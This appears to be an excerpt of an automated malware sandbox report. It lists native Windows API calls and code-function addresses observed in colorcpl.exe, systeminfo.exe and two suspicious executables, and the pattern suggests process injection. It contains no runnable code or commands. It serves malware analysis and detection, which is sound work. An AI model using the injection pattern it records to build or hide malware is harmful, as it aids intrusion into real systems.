                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512FE0 NtCreateFile,11_2_2C512FE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512F90 NtProtectVirtualMemory,11_2_2C512F90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512FB0 NtResumeThread,11_2_2C512FB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512FA0 NtQuerySection,11_2_2C512FA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5139B0 NtGetContextThread,11_2_2C5139B0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512AD0 NtReadFile,11_2_2C512AD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512AF0 NtWriteFile,11_2_2C512AF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512AB0 NtWaitForSingleObject,11_2_2C512AB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512BF0 NtAllocateVirtualMemory,11_2_2C512BF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512BE0 NtQueryValueKey,11_2_2C512BE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512B80 NtQueryInformationFile,11_2_2C512B80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512BA0 NtEnumerateValueKey,11_2_2C512BA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C514650 NtSuspendThread,11_2_2C514650
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C513010 NtOpenDirectoryObject,11_2_2C513010
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C513090 NtSetValueKey,11_2_2C513090
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C514340 NtSetContextThread,11_2_2C514340
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073CC663 NtClose,11_2_073CC663
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA35C0 NtCreateMutant,LdrInitializeThunk,14_2_04EA35C0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA4650 NtSuspendThread,LdrInitializeThunk,14_2_04EA4650
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA4340 NtSetContextThread,LdrInitializeThunk,14_2_04EA4340
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04EA2CA0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2C60 NtCreateKey,LdrInitializeThunk,14_2_04EA2C60
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04EA2C70
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04EA2DF0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2DD0 NtDelayExecution,LdrInitializeThunk,14_2_04EA2DD0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04EA2D30
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04EA2D10
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04EA2EE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04EA2E80
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2FE0 NtCreateFile,LdrInitializeThunk,14_2_04EA2FE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2FB0 NtResumeThread,LdrInitializeThunk,14_2_04EA2FB0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2F30 NtCreateSection,LdrInitializeThunk,14_2_04EA2F30
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA39B0 NtGetContextThread,LdrInitializeThunk,14_2_04EA39B0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2AF0 NtWriteFile,LdrInitializeThunk,14_2_04EA2AF0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2AD0 NtReadFile,LdrInitializeThunk,14_2_04EA2AD0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04EA2BE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04EA2BF0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04EA2BA0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2B60 NtClose,LdrInitializeThunk,14_2_04EA2B60
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA3090 NtSetValueKey,14_2_04EA3090
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA3010 NtOpenDirectoryObject,14_2_04EA3010
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2CF0 NtOpenProcess,14_2_04EA2CF0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2CC0 NtQueryVirtualMemory,14_2_04EA2CC0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2C00 NtQueryInformationProcess,14_2_04EA2C00
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2DB0 NtEnumerateKey,14_2_04EA2DB0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA3D70 NtOpenThread,14_2_04EA3D70
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2D00 NtSetInformationFile,14_2_04EA2D00
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA3D10 NtOpenProcessToken,14_2_04EA3D10
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2EA0 NtAdjustPrivilegesToken,14_2_04EA2EA0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2E30 NtWriteVirtualMemory,14_2_04EA2E30
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2FA0 NtQuerySection,14_2_04EA2FA0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2F90 NtProtectVirtualMemory,14_2_04EA2F90
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2F60 NtCreateProcessEx,14_2_04EA2F60
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2AB0 NtWaitForSingleObject,14_2_04EA2AB0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA2B80 NtQueryInformationFile,14_2_04EA2B80
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D69210 NtReadFile,14_2_02D69210
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D693A0 NtClose,14_2_02D693A0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D69300 NtDeleteFile,14_2_02D69300
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D690B0 NtCreateFile,14_2_02D690B0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D69510 NtAllocateVirtualMemory,14_2_02D69510
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F320B46_2_02F320B4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0C0011_2_2C4E0C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C559C3211_2_2C559C32
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59FCF211_2_2C59FCF2
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D0CF211_2_2C4D0CF2
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB511_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C591D5A11_2_2C591D5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D4011_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C597D7311_2_2C597D73
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EAD0011_2_2C4EAD00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFDC011_2_2C4FFDC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE011_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F8DBF11_2_2C4F8DBF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0E5911_2_2C4E0E59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59EE2611_2_2C59EE26
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59EEDB11_2_2C59EEDB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59CE9311_2_2C59CE93
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F2E9011_2_2C4F2E90
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E9EB011_2_2C4E9EB0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C554F4011_2_2C554F40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59FF0911_2_2C59FF09
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C500F3011_2_2C500F30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D2FC811_2_2C4D2FC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4ECFE011_2_2C4ECFE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1F9211_2_2C4E1F92
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59FFB111_2_2C59FFB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E284011_2_2C4E2840
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EA84011_2_2C4EA840
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50E8F011_2_2C50E8F0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E38E011_2_2C4E38E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C68B811_2_2C4C68B8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E995011_2_2C4E9950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FB95011_2_2C4FB950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F696211_2_2C4F6962
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A011_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5AA9A611_2_2C5AA9A6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59FA4911_2_2C59FA49
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C597A4611_2_2C597A46
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C553A6C11_2_2C553A6C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58DAC611_2_2C58DAC6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DEA8011_2_2C4DEA80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C525AA011_2_2C525AA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57DAAC11_2_2C57DAAC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59AB4011_2_2C59AB40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59FB7611_2_2C59FB76
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C596BD711_2_2C596BD7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C51DBF911_2_2C51DBF9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFB8011_2_2C4FFB80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59244611_2_2C592446
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D146011_2_2C4D1460
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59F43F11_2_2C59F43F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58E4F611_2_2C58E4F6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59757111_2_2C597571
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E053511_2_2C4E0535
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A059111_2_2C5A0591
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57D5B011_2_2C57D5B0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5916CC11_2_2C5916CC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FC6E011_2_2C4FC6E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50475011_2_2C504750
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E077011_2_2C4E0770
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DC7C011_2_2C4DC7C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59F7B011_2_2C59F7B0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E70C011_2_2C4E70C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58F0CC11_2_2C58F0CC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5970E911_2_2C5970E9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59F0E011_2_2C59F0E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5AB16B11_2_2C5AB16B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C51516C11_2_2C51516C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF17211_2_2C4CF172
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D010011_2_2C4D0100
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57A11811_2_2C57A118
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5981CC11_2_2C5981CC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A01AA11_2_2C5A01AA
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EB1B011_2_2C4EB1B0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58027411_2_2C580274
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FB2C011_2_2C4FB2C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5812ED11_2_2C5812ED
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E52A011_2_2C4E52A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CD34C11_2_2C4CD34C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59A35211_2_2C59A352
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59132D11_2_2C59132D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A03E611_2_2C5A03E6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EE3F011_2_2C4EE3F0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C52739A11_2_2C52739A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073B860311_2_073B8603
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073B67FE11_2_073B67FE
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073AE1A311_2_073AE1A3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073AE19711_2_073AE197
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073A306011_2_073A3060
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073B005311_2_073B0053
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073AE05311_2_073AE053
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073AE04C11_2_073AE04C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073AFE3311_2_073AFE33
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073CEC6311_2_073CEC63
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073A1BF011_2_073A1BF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073A1BE511_2_073A1BE5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073B680311_2_073B6803
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D9AD8013_2_05D9AD80
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D925B013_2_05D925B0
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D927D013_2_05D927D0
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D907D013_2_05D907D0
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D907C913_2_05D907C9
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D98F8013_2_05D98F80
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D98F7B13_2_05D98F7B
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D9770013_2_05D97700
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D9091413_2_05D90914
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05D9092013_2_05D90920
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeCode function: 13_2_05DB13E013_2_05DB13E0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F1E4F614_2_04F1E4F6
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E6146014_2_04E61460
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2244614_2_04F22446
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2F43F14_2_04F2F43F
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F0D5B014_2_04F0D5B0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F3059114_2_04F30591
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2757114_2_04F27571
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7053514_2_04E70535
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8C6E014_2_04E8C6E0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F216CC14_2_04F216CC
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E6C7C014_2_04E6C7C0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2F7B014_2_04F2F7B0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7077014_2_04E70770
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E9475014_2_04E94750
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2F0E014_2_04F2F0E0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F270E914_2_04F270E9
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E770C014_2_04E770C0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F1F0CC14_2_04F1F0CC
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F281CC14_2_04F281CC
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7B1B014_2_04E7B1B0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F301AA14_2_04F301AA
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EA516C14_2_04EA516C
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E5F17214_2_04E5F172
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F3B16B14_2_04F3B16B
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E6010014_2_04E60100
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F0A11814_2_04F0A118
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F112ED14_2_04F112ED
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8B2C014_2_04E8B2C0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E752A014_2_04E752A0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F1027414_2_04F10274
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F303E614_2_04F303E6
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7E3F014_2_04E7E3F0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EB739A14_2_04EB739A
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2A35214_2_04F2A352
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E5D34C14_2_04E5D34C
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2132D14_2_04F2132D
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2FCF214_2_04F2FCF2
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E60CF214_2_04E60CF2
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F10CB514_2_04F10CB5
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EE9C3214_2_04EE9C32
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E70C0014_2_04E70C00
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E6ADE014_2_04E6ADE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8FDC014_2_04E8FDC0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E88DBF14_2_04E88DBF
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F27D7314_2_04F27D73
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E73D4014_2_04E73D40
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F21D5A14_2_04F21D5A
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7AD0014_2_04E7AD00
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2EEDB14_2_04F2EEDB
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E79EB014_2_04E79EB0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2CE9314_2_04F2CE93
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E82E9014_2_04E82E90
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E70E5914_2_04E70E59
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2EE2614_2_04F2EE26
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7CFE014_2_04E7CFE0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E62FC814_2_04E62FC8
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2FFB114_2_04F2FFB1
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E71F9214_2_04E71F92
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EE4F4014_2_04EE4F40
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E90F3014_2_04E90F30
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2FF0914_2_04F2FF09
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E738E014_2_04E738E0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E9E8F014_2_04E9E8F0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E568B814_2_04E568B8
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7284014_2_04E72840
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7A84014_2_04E7A840
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E729A014_2_04E729A0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F3A9A614_2_04F3A9A6
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8696214_2_04E86962
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E7995014_2_04E79950
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8B95014_2_04E8B950
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F1DAC614_2_04F1DAC6
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EB5AA014_2_04EB5AA0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F0DAAC14_2_04F0DAAC
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E6EA8014_2_04E6EA80
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EE3A6C14_2_04EE3A6C
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F27A4614_2_04F27A46
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2FA4914_2_04F2FA49
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04EADBF914_2_04EADBF9
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F26BD714_2_04F26BD7
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04E8FB8014_2_04E8FB80
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2FB7614_2_04F2FB76
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_04F2AB4014_2_04F2AB40
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D51CC014_2_02D51CC0
